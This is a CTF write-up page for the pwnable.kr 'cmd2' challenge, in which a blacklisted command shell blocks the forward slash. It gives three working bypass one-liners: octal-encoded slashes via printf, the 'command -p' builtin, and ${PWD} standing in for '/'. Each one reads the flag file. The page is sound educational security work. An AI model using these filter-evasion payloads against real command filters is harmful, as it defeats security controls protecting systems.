🌌
N/B Writeups
  • CTF Writeups
  • CTFs
    • 2019
      • OverTheWire Advent
    • 2020
      • Midnight Sun
      • Things I learned from DarkCTF
  • Pwnable.kr
    • 01 - fd
    • 02 - col
    • 03 - bof
    • 04 - flag
    • 05 - passcode
    • 06 - random
    • 07 - input
    • 08 - leg
    • 09 - mistake
    • 10 - Shellshock
    • 11 - coin1
    • 12 - blackjack
    • 13 - lotto
    • 14 - cmd1
    • 15 - cmd2
    • 16 - uaf
    • 17 - memcpy
    • 18 - asm
    • 20 - blukat
    • 21 - horcruxes
    • 33 - echo1
    • 34 - echo2
    • 43 - coin2
  • More Pwn
    • Protostar - format4
  • Lord of SQLI
    • Lord of SQLI
Powered by GitBook
On this page
  • The Challenge
  • The Solution
  • Solution #1 - Octal Encoding
  • Solution #2 - Builtin Secrets
  • Solution #3 - ${PWD}

Was this helpful?

  1. Pwnable.kr

15 - cmd2

Previous14 - cmd1Next16 - uaf

Last updated 4 years ago

Was this helpful?

The Challenge

Daddy bought me a system command shell. but he put some filters to prevent me from playing with it without his permission... but I wanna play anytime I want!

ssh cmd2@pwnable.kr -p2222 (pw:flag of cmd1)

The Solution

Another blacklisting challenge, this time on steroids. The greatest hurdle is the prohibition on using forward slash.

Solution #1 - Octal Encoding

dash supports octal encoding [not hex]. It's important to surround the argument with single quotes soprintfwon't execute before being passed as an argument.

./cmd2 '$(printf "\57bin\57cat fla*")'

Solution #2 - Builtin Secrets

Bash has a builtin named command. It can be used with the flag -p to revert to the default function lookup.

./cmd2 'command -p cat fla*'

Solution #3 - ${PWD}

If you navigate to the root directory $PWD will equal to, well, forward slash.

./cmd2 'cd ..;cd ..; ${PWD}bin${PWD}cat ${PWD}home${PWD}cmd2${PWD}fla*'